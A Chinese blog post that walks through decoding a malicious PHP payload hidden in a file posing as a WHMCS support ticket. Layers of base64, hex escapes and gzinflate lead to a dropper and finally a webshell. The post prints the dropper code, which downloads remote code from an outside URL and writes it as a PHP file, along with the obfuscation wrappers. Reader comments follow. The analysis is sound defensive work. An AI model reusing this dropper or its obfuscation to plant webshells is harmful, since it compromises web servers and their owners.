php解码

在某群收到了这样一个文件(1.txt) , 说是whmcs的一个ticket。

打开后发现是

{php}eval(base64_decode('...')){/php}

于是很明显的发现是要执行某段代码, 于是将这个代码改成了

<?php print(base64_decode('...')); ?>

运行之, 得文件1.php

<?php

$code = file_get_contents('http://tanzilfurqon.web.ugm.ac.id//templates/jj_pink_sunset/zz/jgndihapus.txt');
$fo = fopen("wsob2.php","w");
$fo2 = fopen("attachments/wsob2.php","w");
...
?>

一看就是要写文件, 于是访问http://tanzilfurqon.web.ugm.ac.id//templates/jj_pink_sunset/zz/jgndihapus.txt得到文件2.txt

发现内有

...
preg_replace("/.*/e","\x65\x76\x61\x6C\x28\x67\x7A\x69\x6E\x66\x6C\x61\x74\x65\x28\x62\x61\x73\x65\x36\x34\x5F\x64\x65\x63\x6F\x64\x65\x28'...''\x29\x29\x29\x3B",".");
...

代码, 改造之, 使其输出”\x65…\x3B”部分得2.php。

运行之, 得3.txt

eval(gzinflate(base64_decode('')))

加入<?php ?>, 将eval改为print, 得3.php, 运行之得4.txt, 发现其内容为一个webshell。

总结: 发现了一个gzdeflate/gzinflate可以用来压缩/解压php代码, 得到了一个php的webshell。

用到的文件如下

package

发表评论?

6 条评论。

  1. 你还真有耐心去解那点windows-1252……

  2. 我擦我怎么忘了php print…… :shock:

  3. 总之现在加/解密就那么点技巧。
    另:迫于Dot TK将我的域名变为了收费域名,于是我把我的网站域名改为了samhjn.co.cc,希望能把pic.samhjn.tk改为pic.samhjn.co.cc,并修改友链地址。谢谢。

发表评论

注意 - 你可以用以下 HTML tags and attributes:
<a href="" title=""> <abbr title=""> <acronym title=""> <b> <blockquote cite=""> <cite> <code> <del datetime=""> <em> <i> <q cite=""> <s> <strike> <strong>

:wink: :twisted: :roll: :oops: :mrgreen: :lol: :idea: :evil: :cry: :arrow: :?: :-| :-x :-o :-P :-D :-? :) :( :!: 8-O 8)

本文链接:https://twd2.me/archives/1796QrCode